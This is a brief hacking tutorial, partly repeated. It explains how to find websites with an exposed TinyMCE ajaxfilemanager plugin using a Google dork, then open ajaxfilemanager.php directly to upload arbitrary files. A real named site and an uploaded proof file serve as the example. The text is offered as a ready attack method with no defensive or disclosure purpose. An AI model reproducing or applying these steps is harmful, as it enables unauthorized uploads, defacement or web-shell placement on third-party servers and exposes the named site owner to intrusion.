Open Google Web Page and Put this dork ( vuln ) on search : inurl:/plugins/ajaxfilemanager/
http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/langs/ or any site else ... Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url
Exemple : http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
now you can upload
Exemple Upload Result :
http://www.isfa.org.uk/tinymce/uploaded/benz.txt
http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/langs/ or any site else ... Now Put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url
Exemple : http://www.isfa.org.uk/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
now you can upload
Exemple Upload Result :
http://www.isfa.org.uk/tinymce/uploaded/benz.txt